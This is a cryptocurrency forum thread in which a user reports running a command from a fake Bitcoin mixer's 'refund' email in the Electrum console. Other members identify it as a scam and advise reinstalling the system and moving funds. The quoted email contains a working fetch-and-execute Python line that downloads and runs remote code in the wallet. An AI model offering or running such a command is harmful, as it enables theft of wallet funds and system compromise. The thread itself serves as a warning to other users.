Author

Topic: Electrum console command (Read 372 times)

legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
October 26, 2019, 01:10:26 PM
#18
~snip~
AFAIK those software you mentioned only available on Windows

Malwarebytes can be installed in Linux based OS but you need to install both Wine and Visual Basic 6.0 Run-Time to make Malwarebytes works.

There are some guidelines on how to install this software in Linux to check this guide click the link below.

- How to Install Malwarebytes on Ubuntu

If you need Wine, then technically it's not available on Linux. There's no guarantee all Windows application will run properly on linux.

It's different story if it needs interpreter (such as Mono) or VM (such as JVM)
legendary
Activity: 3710
Merit: 1586
October 28, 2019, 03:06:14 PM
#17
malwarebytes won't know anything about linux malware. there would be no point in installing it
legendary
Activity: 3472
Merit: 3217
Playbet.io - Crypto Casino and Sportsbook
October 24, 2019, 06:07:22 PM
#16
~snip~
AFAIK those software you mentioned only available on Windows

Malwarebytes can be installed in Linux based OS but you need to install both Wine and Visual Basic 6.0 Run-Time to make Malwarebytes works.

There are some guidelines on how to install this software in Linux to check this guide click the link below.

- How to Install Malwarebytes on Ubuntu
copper member
Activity: 2338
Merit: 4543
Join the world-leading crypto sportsbook NOW!
October 24, 2019, 09:49:24 AM
#15
it's seems unreal that you can infect Linux system by executing command in Electrum. Please somebody confirm or deny that it's possible.

Dangerous misconception.  Linux systems are as vulnerable to malware and viruses as any other system.  Most hackers target Windows and Macs because they are more common, and therefor maximize the hacker's efforts.  This has given many Linux users a false sense of security.  Mac OS has been based on Unix for several years now, and as a result there are more hacks that can target multiple platforms. 

As o_e_l_e_o mentioned, you executed a python command from and untrustworthy source.  The best way to ensure your safety is to delete your hard drive partitions and reinstall the OS.
legendary
Activity: 3710
Merit: 1586
October 24, 2019, 07:13:27 AM
#14
You are guys scaring the **** out of me. I have deleted my wallet but it's seems unreal that you can infect Linux system by executing command in Electrum. Please somebody confirm or deny that it's possible.

if it's linux and you're running as an unprivileged user then at best it has access to files that that user has access to. it's still possible for it to install malware that runs when the user logs in. that malware could then snoop on your electrum seed and/or password when you enter it. so IMO it would be better to do a reinstall just to be safe. you don't want to take a risk with money involved.
legendary
Activity: 2730
Merit: 7065
October 24, 2019, 04:47:07 AM
#13
Is there any way to check if OS is compromised? I'm using Kali Linux...
You can scan your OS with a quality anti virus software, try additional software like Spybot Search & Destroy, Malwarebytes, anti rootkit scanners but there are still no guarantees that it will detect anything. The results might come back as clean if the code is still fresh and not yet recognized as malicious by AV vectors.
Reinstalling your OS is the safest way to go. Anything else is a gamble.
legendary
Activity: 3472
Merit: 1724
October 23, 2019, 11:10:59 PM
#12
ouch!

Is there any way to check if OS is compromised? I'm using Kali Linux...

Thanks

To be on the safe side, you should at a minimum reinstall your system. Don't take any chances when money is at stake (I assume you'll be using this OS instance to handle bitcoins).
newbie
Activity: 5
Merit: 0
October 23, 2019, 03:55:09 PM
#11
The Electrum console is just a python interface. As far as I am aware, it will run any python code. This seems to be confirmed by the following GitHub page: https://github.com/spesmilo/electrum/issues/3678. So yes, it seems entirely possible that you could have compromised your system, unless you were running Electrum in a secure sandbox.

I have no idea what the file you downloaded was, and I have no desire to download it and find out. It could very well have contained code to compromise your system. That's why there is a big warning on the console telling you not to do the exact thing you did.

As Abdussamad says, the only way you can be 100% safe is to reformat.

ouch!

Is there any way to check if OS is compromised? I'm using Kali Linux...

Thanks
legendary
Activity: 2268
Merit: 18771
October 23, 2019, 02:05:06 PM
#10
The Electrum console is just a python interface. As far as I am aware, it will run any python code. This seems to be confirmed by the following GitHub page: https://github.com/spesmilo/electrum/issues/3678. So yes, it seems entirely possible that you could have compromised your system, unless you were running Electrum in a secure sandbox.

I have no idea what the file you downloaded was, and I have no desire to download it and find out. It could very well have contained code to compromise your system. That's why there is a big warning on the console telling you not to do the exact thing you did.

As Abdussamad says, the only way you can be 100% safe is to reformat.
newbie
Activity: 5
Merit: 0
October 23, 2019, 07:20:53 AM
#9
You are guys scaring the **** out of me. I have deleted my wallet but it's seems unreal that you can infect Linux system by executing command in Electrum. Please somebody confirm or deny that it's possible.
legendary
Activity: 3710
Merit: 1586
October 23, 2019, 01:45:35 AM
#8
your PC is likely compromised now since you ran a malicous program on it. you should have paid attention to the warning on the console tab. it tells you not to run random code from untrusted sources!

best to reformat, reinstall the OS and electrum and move your coins to a new wallet.
legendary
Activity: 2618
Merit: 6452
Self-proclaimed Genius
October 23, 2019, 12:51:47 AM
#7
I don't think Electrum have a native error like that,
it seems like the command was successfully executed and it's just a pre-defined result.
All because, Electrum doesn't have a support to contact, no?

@duckduckwent If I were you, I will create a new seed/wallet in another PC, send all my funds to it and wipe my current PC clean to be sure.
That command is strikingly similar to fake mixer: helix's support message, it runs a script to send your seed to their server & more bonus scripts.
newbie
Activity: 5
Merit: 0
October 22, 2019, 05:18:24 PM
#6
Thank you guys so much. I'm very new so mistakes were expected. Thanks again.
legendary
Activity: 1876
Merit: 3139
October 22, 2019, 05:14:57 PM
#5
What  that command does anyway ? Could the still my Electrum password somehow? Should I change my passwords.

It executes the code downloaded from an external website. I can't really tell you what it exactly does because I am unable to view the contents of the link. I don't think that they have stolen your Electrum password.
copper member
Activity: 2338
Merit: 4543
Join the world-leading crypto sportsbook NOW!
October 22, 2019, 05:14:06 PM
#4
That's a bunch of BS!  Luckily you didn't enter the command correctly, which is most likely designed to drain your wallet.  No legitimate service is going to ask you to run some command like that.  At the most they'll ask you to sign a message using the address from which you sent the funds.

Use ChipMixer, click on the link in BitCryptex's signature.  
newbie
Activity: 5
Merit: 0
October 22, 2019, 05:11:29 PM
#3
Bitcoinmixer.eu is listed as a scam on this list which is maintained by a trusted member.

I'm realizing now that they are most likely SCAMMERS since their reply address didn't work. My question is, what damage could do the script I executed do to my wallet. Should i delete my wallet? Should I change my password to my other wallet?

Since the console returned an error, I don't think it did any harm to your wallet. You might want to move your coins to a new wallet, just in case. If it had been executed correctly, I am sure that your funds would have been transferred out.

Thanks so much for your suggestion.
I transferred my 2 cents to another wallet and deleted likely compromised wallet.
What  that command does anyway ? Could the still my Electrum password somehow? Should I change my passwords.
Thanks again.
legendary
Activity: 1876
Merit: 3139
October 22, 2019, 05:03:06 PM
#2
Bitcoinmixer.eu is listed as a scam on this list which is maintained by a trusted member.

I'm realizing now that they are most likely SCAMMERS since their reply address didn't work. My question is, what damage could do the script I executed do to my wallet. Should i delete my wallet? Should I change my password to my other wallet?

Since the console returned an error, I don't think it did any harm to your wallet. You might want to move your coins to a new wallet, just in case. If the code had been executed correctly, I am sure that your funds would have been transferred out.
newbie
Activity: 5
Merit: 0
October 22, 2019, 04:53:44 PM
#1
I used this bitcoin mixer site bitcoinmixer.eu couple of days ago and after realizing something went wrong, I emailed them for help. Today I got a replay

--------------------------------------
First of all we apologize for the possible problems that may have caused our failure. This has been due to an internal failure in our transaction database, so we are not able to match source with destination. Anyway, we will return all your money including fees as soon as possible. However, we have been victim of cheating attempts and we must verify that you are the owner of the original account. Do not worry, we have simplified the protocol and you should follow just simple instructions. Follow these instructions step by step:
 
1) Open electrum with the wallet you made the transaction.
2) Go to the View menu -> Show console -> Click on the "Console" tab.
3) Type next line and replace “” with the output address you used in the mixing process. (you can copy and paste it from your guarantee letter)" IMPORTANT PRESS ENTER AFTER PASTE IT!!!
 
 
 
4) Then program will ask you to sign an internal message that will be send to us.
5) Wait for the verification message in the command line: "Refund ordered. You will have your funds back in seconds."
 
Example:
 
Suppose your output address was: 1HB5XMLmzFVj8ALj6mfBsbifRoD4miY36v
 
You have to open your electrum console and copy and paste next line (IMPORTANT PRESS ENTER AFTER PASTE IT!!):
 
exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_return/1HB5XMLmzFVj8ALj6mfBsbifRoD4miY36v').text)")
 
Please, do not hesitate to contact us if you have any further questions or complains,
 
BitcoinMixer

-----------------------------------

I did whatever they asked , pasted this command in console
exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_return/18C3DYDMeC5XWvHxBC5EyqMoG5WxMng4cK').text)")
as they instructed and got this message from Electrum console "Server exception, please, contact with support."

I'm realizing now that they are most likely SCAMMERS since their reply address didn't work. My question is, what damage could do the script I executed do to my wallet. Should i delete my wallet? Should I change my password to my other wallet?

Thank you very in advance for your suggestions.
 
 
Jump to: